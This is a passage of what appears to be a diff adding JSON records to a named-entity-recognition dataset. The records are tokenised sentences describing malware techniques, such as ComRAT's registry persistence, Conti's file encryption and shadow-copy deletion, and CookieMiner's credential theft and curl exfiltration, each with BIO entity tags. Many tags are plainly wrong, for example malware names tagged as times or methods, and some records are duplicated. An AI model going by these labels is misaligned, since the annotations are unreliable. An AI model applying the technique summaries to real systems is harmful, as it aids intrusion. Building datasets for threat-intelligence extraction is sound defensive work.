"B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "initially", + "downloads", + "a", + "hidden", + "encoded", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "executes", + "a", + "Python", + "script", + "to", + "download", + "its", + "second", + "stage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "executes", + "a", + "bash", + "script", + "to", + "establish", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CoinTicker", + "executes", + "a", + "bash", + "script", + "to", + "establish", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "can", + "use", + "SSL/TLS", + "encryption", + "for", + "its", + "HTTP-based", + "C2", + "channel.", + "ComRAT", + "has", + "used", + "public", + "key", + "cryptography", + "with", + "RSA", + "and", + "AES", + "encrypted", + "email", + "attachments", + "for", + "its", + "Gmail", + "C2", + "channel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "the", + "ability", + "to", + "use", + "the", + "Gmail", + "web", + "UI", + "to", + "receive", + "commands", + "and", + "exfiltrate", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "encryption", + "and", + "base64", + "to", + "obfuscate", + "its", + "orchestrator", + "code", + "in", + "the", + "Registry.", + "ComRAT", + "has", + "also", + "used", + "encoded", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ComRAT", + "samples", + "have", + "been", + "seen", + "which", + "hijack", + "COM", + "objects", + "for", + "persistence", + "by", + "replacing", + "the", + "path", + "to", + "shell32.dll", + "in", + "registry", + "location", + "<code>HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32</code>." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "unique", + "per", + "machine", + "passwords", + "to", + "decrypt", + "the", + "orchestrator", + "payload", + "and", + "a", + "hardcoded", + "XOR", + "key", + "to", + "decrypt", + "its", + "communications", + "module.", + "ComRAT", + "has", + "also", + "used", + "a", + "unique", + "password", + "to", + "decrypt", + "the", + "file", + "used", + "for", + "its", + "hidden", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "injected", + "its", + "orchestrator", + "DLL", + "into", + "explorer.exe.", + "ComRAT", + "has", + "also", + "injected", + "its", + "communications", + "module", + "into", + "the", + "victim's", + "default", + "browser", + "to", + "make", + "C2", + "connections", + "appear", + "less", + "suspicious", + "as", + "all", + "network", + "connections", + "will", + "be", + "initiated", + "by", + "the", + "browser", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "embedded", + "a", + "XOR", + "encrypted", + "communications", + "module", + "inside", + "the", + "orchestrator", + "module." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "stored", + "encrypted", + "orchestrator", + "code", + "and", + "payloads", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "a", + "portable", + "FAT16", + "partition", + "image", + "placed", + "in", + "%TEMP%", + "as", + "a", + "hidden", + "file", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "can", + "use", + "email", + "attachments", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "a", + "task", + "name", + "associated", + "with", + "Windows", + "SQM", + "Consolidator." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "modified", + "Registry", + "values", + "to", + "store", + "encrypted", + "orchestrator", + "code", + "and", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "can", + "load", + "a", + "PE", + "file", + "from", + "memory", + "or", + "the", + "file", + "system", + "and", + "execute", + "it", + "with", + "<code>CreateProcessW</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "encrypted", + "its", + "virtual", + "file", + "system", + "using", + "AES-256", + "in", + "XTS", + "mode." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "PowerShell", + "to", + "load", + "itself", + "every", + "time", + "a", + "user", + "logs", + "in", + "to", + "the", + "system.", + "ComRAT", + "can", + "execute", + "PowerShell", + "scripts", + "loaded", + "into", + "memory", + "or", + "from", + "the", + "file", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "can", + "check", + "the", + "default", + "browser", + "by", + "querying", + "<code>HKCR\\http\\shell\\open\\command</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "a", + "scheduled", + "task", + "to", + "launch", + "its", + "PowerShell", + "loader." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "been", + "programmed", + "to", + "sleep", + "outside", + "local", + "business", + "hours", + "(9", + "to", + "5,", + "Monday", + "to", + "Friday)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "can", + "check", + "the", + "victim's", + "default", + "browser", + "to", + "determine", + "which", + "process", + "to", + "inject", + "its", + "communications", + "module", + "into." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "checked", + "the", + "victim", + "system's", + "date", + "and", + "time", + "to", + "perform", + "tasks", + "during", + "business", + "hours", + "(9", + "to", + "5,", + "Monday", + "to", + "Friday)." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "HTTP", + "requests", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ComRAT", + "has", + "used", + "<code>cmd.exe</code>", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "executes", + "a", + "batch", + "script", + "to", + "store", + "discovery", + "information", + "in", + "%TEMP%\\info.dat", + "and", + "then", + "uploads", + "the", + "temporarily", + "file", + "to", + "the", + "remote", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "blogs", + "and", + "third-party", + "sites", + "(GitHub,", + "tumbler,", + "and", + "BlogSpot)", + "to", + "avoid", + "DNS-based", + "blocking", + "of", + "their", + "communication", + "to", + "the", + "command", + "and", + "control", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "appends", + "a", + "total", + "of", + "64MB", + "of", + "garbage", + "data", + "to", + "a", + "file", + "to", + "deter", + "any", + "security", + "products", + "in", + "place", + "that", + "may", + "be", + "scanning", + "files", + "on", + "disk." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "the", + "<code>net", + "user</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "RC4", + "and", + "Base64", + "to", + "obfuscate", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "the", + "<code>tasklist</code>", + "to", + "view", + "running", + "processes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "achieves", + "persistence", + "by", + "adding", + "a", + "shortcut", + "of", + "itself", + "to", + "the", + "startup", + "path", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "runs", + "the", + "<code>net", + "view</code>", + "command" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "Rundll32", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "attempts", + "to", + "detect", + "several", + "anti-virus", + "products." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "establishes", + "persistence", + "via", + "a", + ".lnk", + "file", + "in", + "the", + "victim’s", + "startup", + "path." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "encrypts", + "command", + "and", + "control", + "communications", + "with", + "RC4." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "collects", + "the", + "hostname", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "<code>ipconfig", + "/all</code>", + "and", + "<code>route", + "PRINT</code>", + "to", + "identify", + "network", + "adapter", + "and", + "interface", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "executes", + "the", + "<code>netstat", + "-ano</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "runs", + "the", + "command:", + "<code>net", + "start", + ">>", + "%TEMP%\\info.dat</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "executes", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "uses", + "HTTP", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Comnie", + "executes", + "BAT", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Conficker", + "terminates", + "various", + "services", + "related", + "to", + "system", + "security", + "and", + "Windows." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "has", + "used", + "a", + "DGA", + "that", + "seeds", + "with", + "the", + "current", + "UTC", + "victim", + "system", + "date", + "to", + "generate", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "exploited", + "the", + "MS08-067", + "Windows", + "vulnerability", + "for", + "remote", + "code", + "execution", + "through", + "a", + "crafted", + "RPC", + "request." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "B-Exp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "downloads", + "an", + "HTTP", + "server", + "to", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "resets", + "system", + "restore", + "points", + "and", + "deletes", + "backup", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "adds", + "keys", + "to", + "the", + "Registry", + "at", + "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>", + "and", + "various", + "other", + "Registry", + "locations." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "scans", + "for", + "other", + "machines", + "to", + "infect." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "has", + "obfuscated", + "its", + "code", + "to", + "prevent", + "its", + "removal", + "from", + "host", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "adds", + "Registry", + "Run", + "keys", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "variants", + "used", + "the", + "Windows", + "AUTORUN", + "feature", + "to", + "spread", + "through", + "USB", + "propagation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "variants", + "spread", + "through", + "NetBIOS", + "share", + "propagation." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "uses", + "the", + "current", + "UTC", + "victim", + "system", + "date", + "for", + "domain", + "generation", + "and", + "connects", + "to", + "time", + "servers", + "to", + "determine", + "the", + "current", + "date." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conficker", + "copies", + "itself", + "into", + "the", + "<code>%systemroot%\\system32</code>", + "directory", + "and", + "registers", + "as", + "a", + "service." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ConnectWise", + "can", + "be", + "used", + "to", + "execute", + "PowerShell", + "commands", + "on", + "target", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ConnectWise", + "can", + "take", + "screenshots", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ConnectWise", + "can", + "record", + "video", + "on", + "remote", + "hosts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "use", + "<code>CreateIoCompletionPort()</code>,", + "<code>PostQueuedCompletionStatus()</code>,", + "and", + "<code>GetQueuedCompletionPort()</code>", + "to", + "rapidly", + "encrypt", + "files,", + "excluding", + "those", + "with", + "the", + "extensions", + "of", + ".exe,", + ".dll,", + "and", + ".lnk.", + "It", + "has", + "used", + "a", + "different", + "AES-256", + "encryption", + "key", + "per", + "file", + "with", + "a", + "bundled", + "RAS-4096", + "public", + "encryption", + "key", + "that", + "is", + "unique", + "for", + "each", + "victim.", + "Conti", + "can", + "use", + "“Windows", + "Restart", + "Manager”", + "to", + "ensure", + "files", + "are", + "unlocked", + "and", + "open", + "for", + "encryption." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "has", + "decrypted", + "its", + "payload", + "using", + "a", + "hardcoded", + "AES-256", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Conti", + "has", + "loaded", + "an", + "encrypted", + "DLL", + "into", + "memory", + "and", + "then", + "executes", + "it." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "discover", + "files", + "on", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "delete", + "Windows", + "Volume", + "Shadow", + "Copies", + "using", + "<code>vssadmin</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "has", + "used", + "API", + "calls", + "during", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "enumerate", + "remote", + "open", + "SMB", + "network", + "shares", + "using", + "<code>NetShareEnum()</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "use", + "compiler-based", + "obfuscation", + "for", + "its", + "code,", + "encrypt", + "DLLs,", + "and", + "hide", + "Windows", + "API", + "calls." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "enumerate", + "through", + "all", + "open", + "processes", + "to", + "search", + "for", + "any", + "that", + "have", + "the", + "string", + "“sql”", + "in", + "their", + "process", + "name." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "has", + "the", + "ability", + "to", + "discover", + "hosts", + "on", + "a", + "target", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "spread", + "via", + "SMB", + "and", + "encrypts", + "files", + "on", + "different", + "hosts,", + "potentially", + "compromising", + "an", + "entire", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "stop", + "up", + "to", + "146", + "Windows", + "services", + "related", + "to", + "security,", + "backup,", + "database,", + "and", + "email", + "solutions", + "through", + "the", + "use", + "of", + "<code>net", + "stop</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "retrieve", + "the", + "ARP", + "cache", + "from", + "the", + "local", + "system", + "by", + "using", + "the", + "<code>GetIpNetTable()</code>", + "API", + "call", + "and", + "check", + "to", + "ensure", + "IP", + "addresses", + "it", + "connects", + "to", + "are", + "for", + "local,", + "non-Internet,", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "enumerate", + "routine", + "network", + "connections", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "spread", + "itself", + "by", + "infecting", + "other", + "remote", + "machines", + "via", + "network", + "shared", + "drives." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Conti", + "can", + "utilize", + "command", + "line", + "options", + "to", + "allow", + "an", + "attacker", + "control", + "over", + "how", + "it", + "scans", + "and", + "encrypts", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "used", + "base64", + "encoding", + "to", + "obfuscate", + "scripts", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "can", + "steal", + "saved", + "usernames", + "and", + "passwords", + "in", + "Chrome", + "as", + "well", + "as", + "credit", + "card", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "retrieved", + "iPhone", + "text", + "messages", + "from", + "iTunes", + "phone", + "backup", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "used", + "Google", + "Chrome's", + "decryption", + "and", + "extraction", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "checked", + "for", + "the", + "presence", + "of", + "\"Little", + "Snitch\",", + "macOS", + "network", + "monitoring", + "and", + "application", + "firewall", + "software,", + "stopping", + "and", + "exiting", + "if", + "it", + "is", + "found." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "used", + "the", + "<code>curl", + "--upload-file</code>", + "command", + "to", + "exfiltrate", + "data", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "looked", + "for", + "files", + "in", + "the", + "user's", + "home", + "directory", + "with", + "\"wallet\"", + "in", + "their", + "name", + "using", + "<code>find</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "can", + "download", + "additional", + "scripts", + "from", + "a", + "web", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "installed", + "multiple", + "new", + "Launch", + "Agents", + "in", + "order", + "to", + "maintain", + "persistence", + "for", + "cryptocurrency", + "mining", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "used", + "python", + "scripts", + "on", + "the", + "user’s", + "system,", + "as", + "well", + "as", + "the", + "Python", + "variant", + "of", + "the", + "Empire", + "agent,", + "EmPyre." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "loaded", + "coinmining", + "software", + "onto", + "systems", + "to", + "mine", + "for", + "Koto", + "cryptocurrency." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "CookieMiner", + "has", + "checked", + "for", + "the", + "presence", + "of", + "\"Little", + "Snitch\",", + "macOS", + "network", + "monitoring", + "and", + "application", + "firewall", + "software,", + "stopping", + "and", + "exiting", + "if", + "it", + "is", + "found." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + 